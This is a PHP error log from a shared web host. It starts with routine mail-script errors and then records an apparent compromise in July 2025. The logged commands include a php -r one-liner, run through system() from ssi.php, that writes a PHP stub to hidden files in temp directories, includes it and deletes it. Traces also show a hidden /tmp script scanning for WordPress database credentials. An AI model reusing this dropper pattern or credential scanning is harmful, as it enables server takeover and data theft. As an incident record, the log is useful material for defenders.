[26-May-2024 18:03:06 UTC] PHP Warning:  require(PHPMailer/src/Exception.php): Failed to open stream: No such file or directory in /home/aydrdzbp/czonepk.com/portfolio-main/mail.php on line 5
[26-May-2024 18:03:06 UTC] PHP Fatal error:  Uncaught Error: Failed opening required 'PHPMailer/src/Exception.php' (include_path='.:/opt/alt/php81/usr/share/pear:/opt/alt/php81/usr/share/php:/usr/share/pear:/usr/share/php') in /home/aydrdzbp/czonepk.com/portfolio-main/mail.php:5
Stack trace:
#0 {main}
  thrown in /home/aydrdzbp/czonepk.com/portfolio-main/mail.php on line 5
[26-May-2024 18:03:20 UTC] PHP Warning:  require(PHPMailer/src/Exception.php): Failed to open stream: No such file or directory in /home/aydrdzbp/czonepk.com/portfolio-main/mail.php on line 5
[26-May-2024 18:03:20 UTC] PHP Fatal error:  Uncaught Error: Failed opening required 'PHPMailer/src/Exception.php' (include_path='.:/opt/alt/php81/usr/share/pear:/opt/alt/php81/usr/share/php:/usr/share/pear:/usr/share/php') in /home/aydrdzbp/czonepk.com/portfolio-main/mail.php:5
Stack trace:
#0 {main}
  thrown in /home/aydrdzbp/czonepk.com/portfolio-main/mail.php on line 5
[26-May-2024 18:14:26 UTC] Headers:
From: mariammouzoul@gmail.com
Reply-To: replyto@example.com
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8

[26-May-2024 18:14:33 UTC] Headers:
From: mariammouzoul@gmail.com
Reply-To: replyto@example.com
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8

[26-May-2024 18:14:37 UTC] Headers:
From: mariammouzoul@gmail.com
Reply-To: replyto@example.com
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8

[26-May-2024 18:20:32 UTC] PHP Warning:  Undefined variable $headers in /home/aydrdzbp/czonepk.com/portfolio-main/mail.php on line 22
[26-May-2024 18:22:27 UTC] PHP Warning:  Undefined variable $headers in /home/aydrdzbp/czonepk.com/portfolio-main/mail.php on line 21
[26-May-2024 18:25:38 UTC] PHP Warning:  Undefined variable $headers in /home/aydrdzbp/czonepk.com/portfolio-main/mail.php on line 21
[26-May-2024 18:29:11 UTC] PHP Warning:  Undefined variable $headers in /home/aydrdzbp/czonepk.com/portfolio-main/mail.php on line 83
[26-May-2024 18:31:32 UTC] PHP Warning:  Undefined variable $headers in /home/aydrdzbp/czonepk.com/portfolio-main/mail.php on line 84
[26-May-2024 18:35:04 UTC] PHP Warning:  Undefined variable $headers in /home/aydrdzbp/czonepk.com/portfolio-main/mail.php on line 107
[26-May-2024 18:36:23 UTC] PHP Warning:  Undefined variable $headers in /home/aydrdzbp/czonepk.com/portfolio-main/mail.php on line 107
[26-May-2024 18:36:55 UTC] PHP Warning:  Undefined variable $headers in /home/aydrdzbp/czonepk.com/portfolio-main/mail.php on line 107
[26-May-2024 18:48:15 UTC] PHP Warning:  Undefined variable $headers in /home/aydrdzbp/czonepk.com/mrsalm/mail.php on line 107
[26-May-2024 18:49:17 UTC] PHP Warning:  Undefined variable $headers in /home/aydrdzbp/czonepk.com/mrsalm/mail.php on line 107
[26-May-2024 18:52:21 UTC] PHP Warning:  Undefined variable $headers in /home/aydrdzbp/czonepk.com/mrsalm/mail.php on line 108
[26-May-2024 18:53:40 UTC] PHP Warning:  Undefined variable $headers in /home/aydrdzbp/czonepk.com/mrsalm/mail.php on line 108
[26-May-2024 18:54:39 UTC] PHP Warning:  Undefined variable $headers in /home/aydrdzbp/czonepk.com/mrsalm/mail.php on line 109
[26-May-2024 18:55:08 UTC] PHP Warning:  Undefined variable $headers in /home/aydrdzbp/czonepk.com/mrsalm/mail.php on line 109
[01-Jul-2025 23:05:00 UTC] PHP Parse error:  syntax error, unexpected double-quote mark, expecting "]" in /tmp/.ob_iconv_handle on line 2
[01-Jul-2025 23:28:00 UTC] PHP Warning:  system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),&quot;/tmp&quot;,&quot;/var/tmp&quot;,ini_get(&quot;upload_tmp_dir&quot;),getenv(&quot;TEMP&quot;),getenv(&quot;TMP&quot;),getcwd()]);$c=rawurldecode(&quot;%3C%3Fphp%20print%20%22VSBQsWvxMezHxBG%22.%22JNpQRJxouMVk%22%3Bexit%3B&quot;);foreach($dirs as $d){if(is_dir($d)&amp;&amp; is_writable($d)){$p=&quot;{$d}/.class&quot;;if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die(&quot;!notwrtbl!&quot;);'] in /home/aydrdzbp/czonepk.com/mrslmn/ssi.php on line 26
[01-Jul-2025 23:29:54 UTC] PHP Warning:  system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),&quot;/tmp&quot;,&quot;/var/tmp&quot;,ini_get(&quot;upload_tmp_dir&quot;),getenv(&quot;TEMP&quot;),getenv(&quot;TMP&quot;),getcwd()]);$c=rawurldecode(&quot;%3C%3Fphp%20print%20%22GHtnQSUVLueDLM%22.%22vuckAeeKTfrr%22%3Bexit%3B&quot;);foreach($dirs as $d){if(is_dir($d)&amp;&amp; is_writable($d)){$p=&quot;{$d}/.rjust&quot;;if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die(&quot;!notwrtbl!&quot;);'] in /home/aydrdzbp/czonepk.com/mrslmn/ssi.php on line 26
[01-Jul-2025 23:30:13 UTC] PHP Warning:  system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),&quot;/tmp&quot;,&quot;/var/tmp&quot;,ini_get(&quot;upload_tmp_dir&quot;),getenv(&quot;TEMP&quot;),getenv(&quot;TMP&quot;),getcwd()]);$c=rawurldecode(&quot;%3C%3Fphp%20print%20%22yUeDRrXnLEZ%22.%22jnFQczafGTTbFKCDhLWw%22%3Bexit%3B&quot;);foreach($dirs as $d){if(is_dir($d)&amp;&amp; is_writable($d)){$p=&quot;{$d}/.lock&quot;;if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die(&quot;!notwrtbl!&quot;);'] in /home/aydrdzbp/czonepk.com/mrslmn/ssi.php on line 26
[01-Jul-2025 23:30:16 UTC] PHP Warning:  system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),&quot;/tmp&quot;,&quot;/var/tmp&quot;,ini_get(&quot;upload_tmp_dir&quot;),getenv(&quot;TEMP&quot;),getenv(&quot;TMP&quot;),getcwd()]);$c=rawurldecode(&quot;%3C%3Fphp%20print%20%22adJKECSWQkHbiiozpUB%22.%22RcUtjZVjqsPrkBfPpbe%22%3Bexit%3B&quot;);foreach($dirs as $d){if(is_dir($d)&amp;&amp; is_writable($d)){$p=&quot;{$d}/.classes&quot;;if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die(&quot;!notwrtbl!&quot;);'] in /home/aydrdzbp/czonepk.com/mrslmn/ssi.php on line 26
[02-Jul-2025 06:45:08 UTC] PHP Warning:  system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),&quot;/tmp&quot;,&quot;/var/tmp&quot;,ini_get(&quot;upload_tmp_dir&quot;),getenv(&quot;TEMP&quot;),getenv(&quot;TMP&quot;),getcwd()]);$c=rawurldecode(&quot;%3C%3Fphp%20print%20%22YbrPTrBJpj%22.%22CYjRXSsZgCtkUFdLB%22%3Bexit%3B&quot;);foreach($dirs as $d){if(is_dir($d)&amp;&amp; is_writable($d)){$p=&quot;{$d}/.content&quot;;if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die(&quot;!notwrtbl!&quot;);'] in /home/aydrdzbp/czonepk.com/mrslmn/ssi.php on line 26
[02-Jul-2025 06:45:28 UTC] PHP Parse error:  syntax error, unexpected double-quote mark, expecting number in /tmp/.system on line 4
[02-Jul-2025 14:09:22 UTC] PHP Parse error:  syntax error, unexpected double-quote mark, expecting number in /tmp/.ibase_pconnection on line 3
[02-Jul-2025 20:41:03 UTC] PHP Parse error:  syntax error, unexpected double-quote mark, expecting number in /tmp/.multi on line 4
[03-Jul-2025 03:53:39 UTC] PHP Parse error:  syntax error, unexpected double-quote mark, expecting number in /tmp/.accept on line 4
[03-Jul-2025 18:02:41 UTC] PHP Parse error:  syntax error, unexpected double-quote mark, expecting "]" in /tmp/.ob_iconv_handle on line 2
[04-Jul-2025 01:06:22 UTC] PHP Parse error:  syntax error, unexpected double-quote mark, expecting "]" in /tmp/.multi on line 2
[05-Jul-2025 19:16:39 UTC] PHP Parse error:  syntax error, unexpected double-quote mark, expecting "]" in /tmp/.rindex on line 17
[06-Jul-2025 09:14:17 UTC] PHP Parse error:  syntax error, unexpected double-quote mark, expecting number in /tmp/.reset on line 16
[08-Jul-2025 03:25:19 UTC] PHP Parse error:  syntax error, unexpected double-quote mark, expecting "]" in /tmp/.post on line 26
[09-Jul-2025 21:41:08 UTC] PHP Parse error:  syntax error, unexpected double-quote mark, expecting number in /tmp/.post on line 3
[11-Jul-2025 15:36:28 UTC] PHP Parse error:  syntax error, unexpected double-quote mark, expecting number in /tmp/.content on line 3
[12-Jul-2025 12:06:11 UTC] PHP Parse error:  syntax error, unexpected double-quote mark, expecting number in /tmp/.reset on line 3
[13-Jul-2025 09:07:34 UTC] PHP Parse error:  syntax error, unexpected double-quote mark, expecting number in /tmp/.cache on line 27
[14-Jul-2025 06:25:21 UTC] PHP Parse error:  syntax error, unexpected double-quote mark, expecting number in /tmp/.requests on line 27
[15-Jul-2025 03:17:31 UTC] PHP Parse error:  syntax error, unexpected double-quote mark, expecting number in /tmp/.class on line 26
[16-Jul-2025 00:32:21 UTC] PHP Parse error:  syntax error, unexpected double-quote mark, expecting number in /tmp/.db2_convert on line 27
[16-Jul-2025 02:55:57 UTC] PHP Warning:  Undefined array key "DB_HOST" in /tmp/.dbx_convert on line 1
[16-Jul-2025 02:55:57 UTC] PHP Warning:  Undefined array key "DB_USER" in /tmp/.dbx_convert on line 1
[16-Jul-2025 02:55:57 UTC] PHP Warning:  Undefined array key "DB_PASSWORD" in /tmp/.dbx_convert on line 1
[16-Jul-2025 02:55:57 UTC] PHP Warning:  Undefined array key "DB_NAME" in /tmp/.dbx_convert on line 1
[16-Jul-2025 02:55:57 UTC] PHP Fatal error:  Uncaught mysqli_sql_exception: Access denied for user ''@'localhost' (using password: NO) in /tmp/.dbx_convert:1
Stack trace:
#0 /tmp/.dbx_convert(1): mysqli->__construct()
#1 /tmp/.dbx_convert(1): scan_wp()
#2 /tmp/.dbx_convert(1): scan()
#3 /tmp/.dbx_convert(1): scan()
#4 /tmp/.dbx_convert(1): scan()
#5 /tmp/.dbx_convert(1): scan()
#6 Command line code(1): include('/tmp/.dbx_conve...')
#7 {main}
  thrown in /tmp/.dbx_convert on line 1
